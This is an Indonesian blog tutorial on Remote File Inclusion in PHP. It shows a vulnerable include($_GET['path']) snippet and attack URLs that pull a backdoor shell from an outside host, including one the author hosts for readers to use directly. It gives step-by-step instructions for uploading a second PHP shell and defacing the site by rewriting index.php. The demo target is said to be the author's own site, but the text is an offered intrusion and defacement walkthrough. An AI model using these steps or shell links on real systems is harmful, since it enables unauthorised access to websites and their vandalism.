RFI (Remote File Inclusion) adalah tehnik dimana seorang Attacker (Penyerang) melakukan Remote terhadap web yang mengambil filenya melalui URL menggunakan fungsi $_GET['path'] dengan menyertakan isi file tersebut menggunakan fungsi include()
$path = $_GET['path'];
include $path;
?>
Code diatas apabila terletak pada file index.php dan dimasukkan kedalam URL akan menjadi seperti ini
http://www.domain.kita/index.php?path=(File yang akan diambil)
Saya berikan sedikit contoh, di umpamakan saya mempuyai file tersebut diatas (index.php) dengan code yang sama, pada tempat yang sama pula saya memiliki file satu lagi dengan nama fileku.html, nah untuk memunculkan fileku.html tersebut saya melakukan include() terhadap file tersebut pada file index.php, jadi alamat URL yang saya masukan akan seperti ini
http://www.domain.kita/index.php?path=fileku.html
Maka halaman tersebut akan menampilkan isi dari fileku.html
Nahh,, hal inilah yang membuat sang Attacker untuk melakukan Remote terhadap web kita.
Baik saya berikan contoh lagi : Seandainya kamu adalah sang Attacaker tersebut, kamu mempunyai sebuah file pada alamat seperti ini
http://www.sang.attakcer/shell.txt
Dimana isi dari file shell.txt adalah sebuah script Backdoor (Pintu Belakang) yang dapat mengakses web target tersebut, jadi untuk meremot web target tersebut sang Attacker hanya akan mengganti file yang di include() oleh URL target tersebut, sehingga file yang sebelumnya adalah berupa tampilan dari isi file yang dimasukkan sang Admin dari target akan berubah degan tampilan Backdoor dari sang Attacker
http://www.domain.kita/index.php?path=www.sang.attakcer/shell.txt
Demikian sedikit penjelasan saya diatas, semoga dapat di mengerti dan dipahami
Oke,, setelah saudara sekalian pembaca artikel saya ini mengerti dengan sedikit penjelasan saya diatas, maka kita lanjut dengan pemPRAKTEKan,
Dalam hal ini saya akan menggunakan Web saya sebagai targetnya, jadi tanpa merusak Web orang lain kita akan belajar untuk melakukan pendefacan.
Nexxttt...!!!
Target web yang akan di deface adalah
Oke,, disini saya meletakan bug ini pada
http://www.target.tolonggalo.web.id/
index.php?bug_lfi=
Jadi alamat target yang dapat digunakan untuk melakukan hal ini adalah
http://www.target.tolonggalo.web.id/index.php?bug_lfi=
Sekarang kita bakal menginjeksnya dengan file shell kita, berhubung ini hanya untuk bahan pembelajaran jadi code backdoor yang dapat digunakan adalah
Code shell | www.TOLONGGALO.web.id
Buat sebuah file dengan ekstensi ".txt" terus masukan code saya diatas dan upload ke web kamu, atau bisa langsung pake punya saya di
http://www.tolonggalo.web.id/code_shell.txt
Nah,, coba letakkan alamat Code Shell saya ke target, seperti ini
Maka akan tampil shell Palsu yang saya buat,,, :D
http://www.target.tolonggalo.web.id/index.php?bug_lfi=www.tolonggalo.web.id/code_shell.txt
Oke,, setelah shell palsu yang saya buat muncul sekarang kita upload sebuah shell lagi sebagai backdoor,
Pertanyaan : Lo kok kenapa diupload shell lagi?? kan udah ada shell yang ini,,
Baik,, pertanyaan yang bagus,, kenapa,, karena shell yang sekarang dipake tidak mempunyai Akses lebih terhadap target yang kita injeck,, dalam halnya pengeditan, Oke singkat itu aja, ane malas ngomong panjang lebar,, (Capek tau.. wkwkwk :P)
Nexxtt,,
Sama halnya dengan pengincludtan terhadap shell diatas maka code shell yang dapat diupload hanya code yang saya punya :P
Code shell | www.TOLONGGALO.web.id
api kali ini save dengan ekstensi ".php", Habis itu tinggal upload deh,,
Note : Pada akhir kalimat jangan terdapat spasi, agar code dapat di verifikasi dengan benar
Setelah Upload berhasil sekarang buka file shell yang tadi di upload tersebut,
Oke,, sampai disini kita tinggal melakukan deface terhadap web tersebut, dengan cara mengedit file index.php
Caranya, Pertama sediakan script untuk tampilan deface kamu
Atau kalau ngga punya juga ngga apa², nanti ketik aja "Hacked By Nick Kamu",, hehehehehe,, gitu aja kok repot,,
Setelah di edit² file index.php-nya sekarang buka url target tadi,, gimana,, Udah kena deface kan,,?? wkwkwkwkwk,,,
Sekian dulu dari saya, semoga dapat menambah wawasan anda, (Web Target yang di deface adalah Tampilan Manipulasi hasil karya saya sediri, jadi hargailah hasil karya Anak Bangsa,, kalau berkenan Baclink ama web Saya, Bisa gunakan fitur Auto Backlink yang saya buat disamping)